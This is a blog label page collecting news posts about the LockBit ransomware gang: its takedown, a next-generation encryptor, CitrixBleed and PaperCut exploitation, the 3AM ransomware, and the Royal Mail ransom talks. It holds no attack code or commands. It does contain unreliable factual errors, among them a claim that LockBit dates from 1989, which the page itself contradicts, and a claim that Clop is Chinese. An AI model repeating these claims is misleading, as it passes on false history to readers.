Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label LockBit ransomware. Show all posts
LockBit ransomware
Cyber Attacks CyberCrime CyberCriminal Cybersecurity LockBit ransomware

LockBit's Double Cross: Ransom Paid, Data Remains Locked Away

 


In exchange for the payment of a ransom, LockBit ransomware blocks access to the computer systems of its users. With LockBit, all computers on a network can be encrypted by encrypting them, confirming that the target is valuable, spreading the infection, and vetting potential targets. 

Enterprises and other organizations use many types of ransomware to carry out highly targeted and self-piloted cyberattacks. The cybersecurity landscape, which is always changing, is a dangerously competitive one. Adversaries lurk in the shadows and are eager to exploit vulnerabilities and disrupt the operations of organizations. 

There are many threats out there, but LockBit is one of the most formidable, as it has a dark history of evolution, and has been known to target large enterprises across various industries. Key Characteristics of LockBit During the selection of its targets, Lockbit meticulously assesses their financial capacity, as well as their potential disruptions, before choosing the best ones. 

Consequently, there is a concentration on several large businesses across healthcare, education, financial institutions, and government entities as a result of these factors. The automated vetting process can help in selecting targets and making sure they meet a certain set of criteria so that the vetting process can be used. 

There is one surprising aspect of Lockbit's strategic avoidance plan, which leads us to believe that the firm does not target organizations inside Russia and other Commonwealth countries for the same reason. The Lockbit ransomware service operates on what is known as the Ransomware as a Service (RaaS) business model, an operational model that allows affiliates to license the ransomware at a fee, and then they share the ransom payment between themselves and Lockbit as a whole. 

According to Graeme Biggar, the director general of Britain's National Crime Agency (NCA), LockBit was the most prolific and harmful ransomware group operating over the last four years. The group targeted thousands of organizations around the world with its ransomware. An extortion payment was required to obtain the decryption key and to delete the data after the criminal enterprise encrypted the devices on the victim’s computer network and/or stole data from the devices, and demanded that it be paid for the decryption key. 

In recent years, officials have consistently advised against making extortion payments of this type. According to them, such payments not only fund the criminal ecosystem, but there is no guarantee that the decryption key will function due to sloppy coding, and the criminals should not be trusted merely by the promise they will delete victim data. 

It has been revealed by the NCA-led operation that some of LockBit's data belonged to victims who had paid ransom to the threat actors. This last fact has been emphasized by the NCA-led investigation. It was stated in the NCA report that, despite what the criminals have promised, paying a ransom does not guarantee that data will be deleted, even if the ransom is paid. 

Aside from the information gathered from the takedown, the agency also plans to release additional information about the gang's finances and the administrator LockbitSupp, over the remainder of the week based on the intelligence it gained from the takedown.
Read more »
Trend Micro
Cyber Attacks Cybercriminal Tactics LockBit ransomware Ransomware Operation Trend Micro

LockBit Ransomware: Covertly Evolving Towards Next-Gen Threats Amid Takedown Efforts

 

In a significant development, law enforcement dismantled the infrastructure of LockBit ransomware earlier this week, uncovering the clandestine work on a next-generation file encryption malware. Referred to as LockBit-NG-Dev, this emerging threat, likely the precursor to LockBit 4.0, was revealed through a collaborative effort between the UK's National Crime Agency and cybersecurity firm Trend Micro. 

In a departure from its predecessors built in C/C++, LockBit-NG-Dev is a work-in-progress developed in .NET, compiled with CoreRT, and packed with MPRESS. This strategic shift was brought to light as Trend Micro analyzed a sample of the latest LockBit variant capable of operating across multiple systems, indicating a more sophisticated approach to infection. 

Despite lacking some features present in previous versions, such as self-propagation on compromised networks and printing ransom notes on victims' printers, LockBit-NG-Dev appears to be in its final development stages, providing the most anticipated functionalities. Trend Micro's technical analysis reveals the encryptor's support for three encryption modes (using AES+RSA) – "fast," "intermittent," and "full." It includes a custom file or directory exclusion and the ability to randomize file naming to complicate restoration efforts. 

Notably, the malware features a self-delete mechanism that overwrites LockBit's own file contents with null bytes. The discovery of LockBit-NG-Dev is a significant setback for LockBit operators, following law enforcement's Operation Cronos. Even if the gang still controls backup servers, the exposure of the new encryptor's source code poses a formidable challenge for the cybercriminal business. Restoring operations becomes a daunting task when security researchers have knowledge of the encrypting malware's source code. 

This revelation emphasizes the ongoing battle between law enforcement and cybercriminals, underscoring the need for continued vigilance and collaboration to address evolving threats in the ransomware landscape. 

In conclusion, the revelation of LockBit ransomware secretly building a next-gen encryptor serves as a stark reminder of the persistent and adaptive nature of cyber threats. As organizations and cybersecurity professionals work to stay ahead of evolving ransomware tactics, the need for proactive defenses, continuous threat intelligence sharing, and a collective, global response has never been more critical. LockBit's covert evolution reinforces the urgency of fortifying cybersecurity measures to protect against the ever-changing landscape of sophisticated cyber threats.
Read more »
Vulnerabilities and Exploits
Citrix CitrixBleed Bug DP World LockBit LockBit ransomware Ransomware attack Vulnerabilities and Exploits

Researcher Claims: Teens with “Digital Bazookas” are Winning Ransomware War


One thing that Boeing, the Australian shipping company, the world’s largest bank and the world’s biggest law firm share in common is that they have all suffered a cybersecurity incident, at least once. And, these breaches have apparently been conducted by a teenage hacker, all due to the companies’ failure in patching a critical vulnerability that their security professionals warned about weeks ago, according to a post published by doublepulsar on Monday. 

According to Kevin Beaumont, a freelance security researcher, Some other notable victims of cybersecurity breaches include DP World, the Australian branch of the Dubai-based logistics company DP World; Industrial and Commercial Bank of China; and Allen & Overy, a multinational law firm.

These four companies have recently admitted to being struck with at least one security incident. Also, China's ICBC has allegedly paid an undisclosed amount of ransom to retrieve their encryption keys for data that remained unavailable since the breach. 

Beaumont stated the four businesses are among the ten victims he is aware of that are presently being blackmailed by LockBit, one of the most active and destructive ransomware crime syndicates in the world, citing data that allows the tracking of ransomware operators and those familiar with the breaches. Despite a fix being available since October 10, Beaumont claimed that all four of the organizations had yet to apply it to a critical vulnerability. The companies used the networking solution Citrix Netscaler.

CitrixBleed Bug

With a 9.4 severity rating out of 10, CitrixBleed is an easy-to-exploit vulnerability that reveals session tokens that can be used to negate any multifactor authentication mechanisms inside a vulnerable network. Within the affected victim's internal network, attackers are left with the equivalent of a point-and-click desktop PC and are free to move around.

In his post, Beaumont wrote:

Ransomware groups are often staffed by almost all teenagers and haven’t been taken seriously for far too long as a threat. They are a threat to civil society as long as organizations keep paying.

Focusing on cybersecurity fundamentals for enterprise-scale organizations is a challenge, as often people are chasing after the perceived next big thing—metaverse (remember that?), NFTs, generative AI—without being able to do the fundamentals well. Large-scale enterprises need to be able to patch vulnerabilities like CitrixBleed quickly.

The cybersecurity reality we live in now is teenagers are running around in organized crime gangs with digital bazookas. They probably have a better asset inventory of your network than you, and they don’t have to wait 4 weeks for 38 people to approve a change request for patching 1 thing.

Know your network boundary and risky products as well as LockBit do. You need to be able to identify and patch something like CitrixBleed within 24 hours—if you cannot, there is a very real possibility it isn’t the ideal product fit for your organization due to the level of risk it poses, and you need to rethink if the architecture of your house is fit for purpose. 

Vendors like Citrix need to have clear statements of intent for securing their products, as piling on patch after patch after patch is not sustainable for many organizations—or customers should opt with their wallets for more proven solutions. The reality is many vendors are shipping appliance products with cybersecurity standards worse than when I started my career in the late '90s—while also advertising themselves as the experts. Marketing is a hell of a drug.

Beaumont further highlighted query results from the Shodan search service, which showed that at the time of the intrusion, none of the four firms had installed a CitrixBleed patch. The CVE-2023-4966 vulnerability is being monitored.

The researcher additionally condemned Citrix for Netscaler's logging features, which he claimed made it practically impossible for consumers to determine whether they had been hacked. Because of this, it is possible that some users of the CitrixBleed patch were unaware that LockBit was already present on their networks.

However, Boeing refused to comment on the post.

In the case of Citric and Allen& Overy, the emails sent were left unanswered when the post reached Arstechnica. The tech forum further notes that requests for comment from DP World and ICBC were also not immediately followed.

LockBit uses tools like Atera, which offers interactive PowerShell interfaces without triggering antivirus or endpoint detection alerts, to escalate its access to other parts of the compromised network after the CitrixBleed exploit first provides remote access through Virtual Desktop Infrastructure software. This access persists until administrators take specific steps, even after CitrixBleed is patched.  

Read more »
User Privacy
3 am 3 am Ransomware attackers Data Hackers LockBit LockBit ransomware malware Safety Security User Privacy

LockBit Ransomware Falters, Attackers Deploy New '3AM' Malware

 

In a recent cyberattack targeting a construction company, hackers attempted to deploy the LockBit ransomware on a target network but were thwarted. In an unexpected twist, they resorted to a previously unknown ransomware variant called 3AM, successfully infiltrating the system.

The newly discovered ransomware, 3AM, follows a fairly typical pattern by disabling various cybersecurity and backup-related software before encrypting files on the compromised computer. However, it stands out with an unusual theme: the name 3AM, a reference to the eerie hour when only insomniacs, night owls, and malicious hackers are typically active.

Researchers from Symantec highlighted this double-pronged attack in their recent report. It marked the first documented instance of 3AM being used alongside the LockBit ransomware in a single compromised machine.

Dick O'Brien, the principal intelligence analyst for the Symantec threat hunter team, cautioned, "This isn't the first time we've seen attackers employ multiple ransomware families simultaneously, and organizations should be prepared for such scenarios."

Upon gaining access to the target network, the threat actors wasted no time gathering user information and deploying tools for data extraction. They utilized tools like Cobalt Strike and PsExec to escalate privileges and performed reconnaissance tasks such as identifying users and network status. They also sought out other servers for lateral movement and established a new user for persistence. Subsequently, they employed the Wput utility to transfer the victim's files to their FTP server.

Their initial plan was to deploy LockBit ransomware, but the target's robust cybersecurity defenses prevented its execution. Unfortunately for the victim, the attackers had an alternative weapon at their disposal: 3AM ransomware. This malware is characterized by its encryption of files with the ".threeamtime" suffix and references to the time of day in its ransom note.

The ransom note began with an ominous message: "Hello, '3 am' The time of mysticism, isn't it? All your files are mysteriously encrypted, and the systems 'show no signs of life,' the backups disappeared. But we can correct this very quickly and return all your files and operation of the systems to [sic] original state."

In contrast to the creative ransom note, the authors displayed less innovation in the design of the malware itself. 3AM is a 64-bit executable coded in Rust, a language favored by both hackers and defenders. It attempts to terminate various security and backup-related software on the infected machine before proceeding with its primary tasks: scanning the disk, identifying specific file types, encrypting them, delivering the ransom note, and erasing any Volume Shadow (VSS) backup copies of files that could offer a potential lifeline to the victim.

In this particular attack, the hackers only succeeded in deploying 3AM on three machines, with two of them subsequently blocking the malware. However, the third machine was compromised successfully, where LockBit had failed. While the attackers claimed to have stolen sensitive data from this machine, Symantec couldn't independently verify this claim.

When it comes to defending against ransomware attacks, especially multi-faceted ones like this, O'Brien recommends a defense-in-depth strategy. He emphasizes that organizations should focus on addressing all stages of a potential attack rather than solely concentrating on blocking the ransomware payloads. He underscores the importance of early intervention in thwarting cyberattacks, stating that "the earlier you stop an attack, the better."
Read more »
Ransomware
Data Theft LockBit ransomware malware Ransomware

LockBit Digital Gang Named Top Ransomware Threat by World Nations

On Wednesday, a group of seven countries, including the United States, Canada, Britain, France, Germany, Australia, and New Zealand, collectively identified the primary ransomware threat worldwide as the criminal organization known as "LockBit." This digital extortion gang operates under the banner of LockBit and has been recognized as the leading purveyor of ransomware. 

The cyber authorities of these nations issued a joint advisory, highlighting LockBit's ransomware software, which encrypts victims' data until a ransom is paid. Notably, this software has gained widespread usage among cybercriminals, making LockBit the most prevalent ransomware threat globally. 

What is LockBit Ransomware? 

According to the Canadian Centre for Cyber Security, LockBit ransomware has been observed as early as 1989 and has since evolved into the most prevalent cyber threat encountered by Canadians. This malicious software has gained significant prominence and poses a substantial risk to individuals and organizations across the country. 

The Canadian Centre for Cyber Security has reported a significant surge in global ransomware attacks. In the first half of 2021, these attacks witnessed a staggering increase of 151 percent compared to the corresponding period in the previous year. This alarming rise in ransomware incidents further emphasizes the urgent need for enhanced cybersecurity measures and heightened vigilance in the face of evolving cyber threats. 

How it Works? 

LockBit ransomware is a pernicious form of malicious software that specifically aims to immobilize users' computer systems until a ransom is paid. It operates in a sophisticated manner by autonomously assessing potential lucrative targets, spreading the infection, and encrypting all accessible systems within a network. 

This type of ransomware primarily focuses on carrying out highly targeted attacks against enterprises and various other organizations. The operators behind LockBit have established a notorious reputation by issuing menacing threats on a global scale. 

They Employ a Range of Tactics, Including: 

Disrupting operations: LockBit ransomware executes its attack in such a way that critical functions within an organization abruptly come to a halt. This disruption can have severe consequences for the affected entities. 

Extortion for financial gain: The primary motive behind LockBit attacks is monetary gain. The cybercriminals responsible for this ransomware demand a ransom payment from the victims in exchange for restoring access to their systems and data. 

Data theft and blackmail: In addition to encryption, LockBit ransomware also poses a significant risk of data theft. If victims fail to comply with the ransom demands, the attackers may resort to the illegal publication of stolen data as a means of coercion and blackmail. 

What is the Recent Development? 

The precursor to LockBit ransomware was initially detected in September 2019, as stated in the advisory its first appearance on cybercrime forums primarily focused on Russian-language discussions. This indicates the timeline and origin of LockBit's ransomware operations, highlighting its initial activities within the realm of Russian-language-based cybercrime forums. 

Although the joint advisory provided specific numbers for only three countries, namely 1,700 LockBit-related incidents in the United States, 69 in France, and 15 in New Zealand, LockBit ransomware represents a significant portion of the overall ransomware incidents monitored by all seven participating governments. 

According to the advisory, the involved agencies estimated that the LockBit group was responsible for approximately 11 percent to 23 percent of recent ransomware attacks worldwide. This data highlights the substantial impact and prevalence of LockBit's ransom-seeking hacks across multiple regions, underscoring the urgency to address and combat this cyber threat effectively.
Read more »
Ransomware Gang
Cyber Attacks Data exposed Fujitsu Kyocera avx LockBit LockBit ransomware MalwareBytes ransomware attacks Ransomware Gang

Kyocera AVX: Electronic Manufacturer Company the Current Target of LockBit


Kyocera, a global electronics manufacturer, has apparently experienced what seems like a data breach, wherein their data was exposed by ransomware gang LockBit on their dark web blog. The company was one of several who felt the aftershocks of a breach at Japanese tech firm Fujitsu last year.

The group has set a June 9 deadline for the payment of an undetermined ransom. According to the blog, "all available data will be published" if the company does not collaborate with the cybercriminals before then.

Kyocera AVX

Kyocera AVX’s clients involves military, industrial and automotive industries, for whom the company manufactures electronic products. It was established in the 1970s, and since 1990, it has been a part of Kyocera, a Japanese electronics business best known for its printers. Over 10,000 individuals are employed by it globally.

On May 26th, security researchers revealed that selected data of the company has been leaked and posted to LockBit’s dark web victim blog.

Apparently, the company’s data was breached following a cyberattack that took place on Fujitsu last year. The attack might have been the reason why LockBit was able to launch a supply chain attack on Kyocera AVX, and other companies that are partnered with Fujitsu via cyber or other social engineering attacks.

According to a Financial Times report, Fujitsu confirmed the attacks in December following a heads-up given by police agency of a potential intrusion. The intrusion further gave outsiders access to emails sent through an email system powered by Fujitsu.

It was later revealed that at least ten Japan-based companies, along with Kyocera AVX were victims of the attack.

LockBit Continues Cyber Activities Against Russia’s Enemy 

Ransomware gang LockBit, which is assumed to have originated in Russia has been on news highlights pertaining to its interest on targeting organizations based in US and allied countries. 

According to a report by security firm Malwarebytes, 126 victims have been posted by the ransomware gang in February alone.

This year, the gang targeted the UK Royal Mail, demanding ransom of $80 million in bitcoin. When the business refused to pay up, labeling the demands "ridiculous," the gang retaliated by sharing the information along with copies of the conversations between LockBit and Royal Mail's officials.

Later, it stole client information from WH Smith, a high-end street retailer in the UK. The hacker used current and previous employees' personal information. Since then, there has been no information indicating whether the business has paid the ransom.

In its recent case, this month, an individual named Mikhail Pavlovich Matveev who claims to have been involved with LockBit, has a bounty of $10 million on his head placed by the FBI. With connections to both the Hive and Babuk organizations, Matveev is believed to be a major participant in the Russian ransomware ecosystem.  

Read more »
Vulnerabilities and Exploits
Cyberattaccks Cyberattacks Cybersecurity LockBit ransomware Ransomware Vulnerabilities and Exploits

Ransomware Clop and LockBit Attacked PaperCut Servers

 


A Microsoft spokesperson stated in a statement that recent attacks that exploited two vulnerabilities in the PaperCut print management software are likely associated with an affiliate program for the Clop ransomware. 

PaperCut Application Server was updated last month with two vulnerabilities that could allow remote attackers to execute unauthenticated code and access information.

CVE-2023–27350 / ZDI-CAN-18987 / PO-1216: This vulnerability affects all PaperCut MF/NG versions 8.0 or later on all OS platforms, as well as the application server. It impacts both the application server and the site server. 

CVE-2023–27351 / ZDI-CAN-19226 / PO-1219: A vulnerability in PaperCut MF or NG versions 15.0 or later is present on each application server platform, causing unauthenticated information disclosure.

It was notified last week that a vulnerability had been exploited in the wild by Trend Micro, and PaperCut sent an alert out to users. Customer servers must be updated as soon as possible to ensure security.

“Microsoft is attributing the recently reported attacks exploiting the CVE-2023-27350 and CVE-2023-27351 vulnerabilities in print management software PaperCut to deliver Clop ransomware to the threat actor tracked as Lace Tempest (overlaps with FIN11 and TA505),” a tweet by Microsoft Threat Intelligence reads.  

Last week, Microsoft Threat Intelligence identified “Lace Tempest” as one of the threat actors exploiting these bugs, according to a report about BR11 and TA505. 

FIN11, an organization involved in the acceleration of the Accellion FTA extortion campaign, is linked to the infamous Clop ransomware gang. Dridex is reportedly another example of malware linked to TA505 and responsible for Locky. 

Fortra's file-sharing software GoAnywhere has been exploited before by crypto-ransomware campaigns associated with the Clop ransomware affiliate. The affiliate also utilized the Raspberry Robin worm widely distributed in the cybersecurity community post-compromise to perform post-compromise activities.

PaperCut NG and PaperCut MF have flaws that affect both solutions. A remote code execution attack can be conducted on a PaperCut Application server using CVE-2023-27350 by an unauthenticated attacker, while a remote code execution attack on PaperCut MF or NG might also allow an unauthenticated attacker to steal information about users stored in PaperCut MF or NG, such as their names, full names, e-mail addresses, department information, and credit card numbers.

In addition to accessing hashed passwords retrieved from internal PaperCut accounts, attackers exploiting this vulnerability can also retrieve passwords retrieved from external directory sources, such as Microsoft 365 and Google Workspace (although they are not able to access password hashes retrieved from external directory sources such as Microsoft 365 and Google Workspace). 

There have previously been reports indicating that Lace Tempest, also known as DEV-0950, is a Clop affiliate. Lace Tempest has been detected using GoAnywhere exploits and Raspberry Robin malware as part of ransomware campaigns. PaperCut has been targeted since April 13 due to software vulnerabilities. 

Clop has Targeted This Target

It appears that the exploitation of PaperCut servers fits the overall pattern we have seen over the last three years about the Clop ransomware gang. 

Although the Clop operation continues to encrypt files and send them to victims in attacks, BleepingComputer has reported that the operation prefers to steal data from victims. This is so that it can be used to extort them for ransom. 

In 2020, Clop, a Chinese threat actor, exploited one of Accellion's zero-day vulnerabilities, the Accellion FTA, from which he stole data from approximately 100 companies as part of this new shift in tactics.

A zero-day vulnerability in the GoAnywhere MFT secure file-sharing platform has recently been exploited by the Clop gang to steal data from 130 companies due to zero-day vulnerabilities.
Read more »
UK Postal service cyberattack
British postal service Chat Logs revealed Cyber Attacks LockBit LockBit ransomware Royal Mail UK Postal service cyberattack

LockBit Attack: Royal Mail Refuses to Pay 'Absurd' Ransom, Says its Chat Logs


The Royal Mail, which is still experiencing complications as a result of last month's cyberattack, has revealed what the LockBit ransomware gang claims to be the detailed transcript of its negotiations with Royal Mail. 

According to reports, Royal Mail rejected an $80 million (£66 million) ransom demand from the LockBit ransomware gang, declaring that it would "under no circumstances" pay the "absurd amount of money" demanded. 

This is in regard to what appear to be chat logs that LockBit disclosed and were published on February 14, documenting weeks of thorough negotiations between LockBit and its victim, who was attacked on January 10.

The chat logs negotiating the ransoms are apparently the first pieces of information LockBit released following the cyberattack on Royal Mail, that halted the British postal service from sending certain products overseas. This is in spite of earlier threats by the ransomware group with ties to Russia to expose all stolen data on February 9. 

The records seem to indicate that this was the last day of negotiations between LockBit and Royal Mail. Screenshots from LockBit's dark web leak site that was reviewed by TechCrunch reveal that talks started on January 12, two days after the U.K. postal company acknowledged that it had been compromised. 

If the chat logs are legitimate, they indicate that LockBit demanded a grand total of $80 million as a ransom payment, which equals 0.5% of Royal Mail’s annual revenue. The negotiator for Royal Mail appeared to inform LockBit that the company would not comply with the demand and that they had mistaken Royal Mail International for Royal Mail. 

“Under no circumstances will we pay you the absurd amount of money you have demanded[…]We have repeatedly tried to explain to you we are not the large entity you have assumed we are, but rather a smaller subsidiary without the resources you think we have. But you continue to refuse to listen to us. This is an amount that could never be taken seriously by our board.” says Royal Mail’s negotiator (anonymous) to a LockBit representative. 

The ransom demand was reportedly then reduced by LockBit to $70 million on February 1. 

The UK’s National Cyber Security Centre, investigating the Royal Mail has long urged the company against paying the ransom demand since this “does not reduce the risk to individuals, is not an obligation under data protection law, and is not considered as a reasonable step to safeguard data.” Additionally, the FBI advises victims to take precautions such as data backups rather than complying with extortion demands. 

Royal Mail did not object to the legitimacy of the chat records when approached, it has declined to answer certain questions. “As there is an ongoing investigation, law enforcement has advised that it would be inappropriate to make any further comment on this incident,” said a Royal Mail spokesperson, who declined to provide their name. 

The upcoming actions of Royal Mail are still not clear. As of now, since the negotiation between the company and LockBit appears to be unsuccessful, the company could soon be witnessing larger fallout if the stolen data is published online. LockBit’s dark web leak site currently informs that “all available data” has been published, although unavailable to be viewed. 

The postal giant continues to face disruption in its services following the cyberattack, more than a month later. According to a company update dated February 14, despite advances (-i—international services were resumed to all destinations for online purchases) - the company is still unable to process new Royal Mail parcels and large letters requiring a customs declaration bought at the Post Office branches.   

Read more »
Subscribe to: Posts (Atom)